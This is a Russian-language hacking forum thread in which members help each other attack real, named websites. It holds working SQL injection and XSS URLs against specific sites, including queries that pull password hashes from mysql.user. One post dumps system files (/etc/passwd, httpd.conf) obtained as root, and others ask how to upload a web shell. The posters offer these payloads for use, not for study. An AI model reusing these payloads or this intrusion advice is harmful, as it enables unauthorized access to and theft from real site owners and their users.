Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. scorpic393

    scorpic393 Banned

    Joined:
    5 Feb 2010
    Messages:
    59
    Likes Received:
    4
    Reputations:
    3
    вообщето это не инклуд а iframe

    http://extensis.cnrc.navy.mil/index.htm?content=http://google.com'

    так что доводить нечего...
     
  2. BrainDeaD

    BrainDeaD Elder - Старейшина

    Joined:
    9 Jun 2005
    Messages:
    774
    Likes Received:
    292
    Reputations:
    214
    Code:
    http://www.celestron.com/skyscout/skyscout_page.php?page_name=skyscout_features&page_id=%3Cscript%3Ealert()%3C/script%3E
    со скулем можно что-то накрутить? и какие здесь вообще есть варианты?
     
  3. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    http://www.celestron.com/skyscout/skyscout_page.php?page_name=skyscout_features&page_id=1+union+select+1,2,3,version(),5,6,7,8,9,10+limit+1,1
    
     
    1 person likes this.
  4. -=Razor=-

    -=Razor=- Member

    Joined:
    20 Dec 2008
    Messages:
    30
    Likes Received:
    29
    Reputations:
    3
    Code:
    http://www.celestron.com/skyscout/skyscout_page.php?page_name=skyscout_features&page_id=-1+union+select+1,2,3,password,5,6,7,8,9,10+from+mysql.user
     
    1 person likes this.
  5. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    database(): od4
    @@basedir: /usr/
    @@tmpdir: /tmp/
    version(): 5.0.77
    user(): root@localhost           <====
    @@datadir: /var/lib/mysql/
    @@version_compile_os: redhat-linux-gnu
    
    -----------------------------------------
    File [/etc/passwd] size: - 1759 bytes
    -----------------------------------------
    
     root:x:0:0:root:/root:/bin/bash
    bin:x:1:1:bin:/bin:/sbin/nologin
    daemon:x:2:2:daemon:/sbin:/sbin/nologin
    adm:x:3:4:adm:/var/adm:/sbin/nologin
    lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
    sync:x:5:0:sync:/
    
    ...
    -----------------------------------------
    File [/etc/httpd/conf/httpd.conf] size: - 39844 bytes
    -----------------------------------------
    
     #
    # This is the main Apache server configuration file.  It contains the
    # configuration directives that give the server its instructions.
    # See <URL:http://httpd.apache.org/docs/2.2/> for detailed inf
    
    ...
    
     
  6. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    Что значет есле при выходе SQL injection в низу написанно
    [XT SQL Error]
    что это??
    и ище очень часто я встречяюсь с этим
    типа You have an error in your SQL syntax;...................

    [TEP STOP]

    и разкрутить неразу не удалось.. что это может быть?
    HELP !"
     
  7. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    вроде второй раз уже спрашиваешь, дай живой пример, какая тебе разница, если сам раскрутить не можешь, и телепатировать не придется
     
  8. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    Pashkela вот один сайт.. прост не хотел палить ну другова варианта нет
    _http://piskurek.camping-profi.de/index.php?cat=c189_Kabeltrommeln-und-Stromeinspeisung.html&page=-2%27
     
  9. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    328
    Likes Received:
    142
    Reputations:
    81
    Это почти безнадежно, там SQLi в лимите. Насколько знаю в таких случаях возможно использование только into outfile и то если будут права и будеш знать полный путь.
    Ну а [XT SQL Error] это типа предупреждение вшитое самими разработчиками xt:Commerce.
     
    1 person likes this.
  10. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    помояите залить шелл поjaлуста..

    не получаеться..
     
  11. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    2 LokbatanLi
    там меджики.
     
  12. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    ну на самом деле можно попробовать еще вот этот способ...

    http://forum.antichat.ru/threadnav43966-4-10.html
     
  13. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    неужели там хеши?
     
  14. root_sashok

    root_sashok Elder - Старейшина

    Joined:
    4 Aug 2008
    Messages:
    389
    Likes Received:
    573
    Reputations:
    102
    Почему user() иногда возвращает кавычку?

    Code:
    '@localhost
     
  15. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    нет не получаеться
     
  16. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    покажи как ты пробовал?
     
  17. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    даje не моq пробовать..
     
  18. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    601
    Likes Received:
    116
    Reputations:
    37
    Выложи ссыль.
     
  19. root_sashok

    root_sashok Elder - Старейшина

    Joined:
    4 Aug 2008
    Messages:
    389
    Likes Received:
    573
    Reputations:
    102
    Code:
    http://www.vales.by/catalog.php?action=show_object&id=109+union+select+concat_ws(0x3a,user(),database(),version())--
     
  20. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Здесь юзер valesby@localhost и никакой кавычки. С чего ты взял, что там кавычка?
     
Thread Status:
Not open for further replies.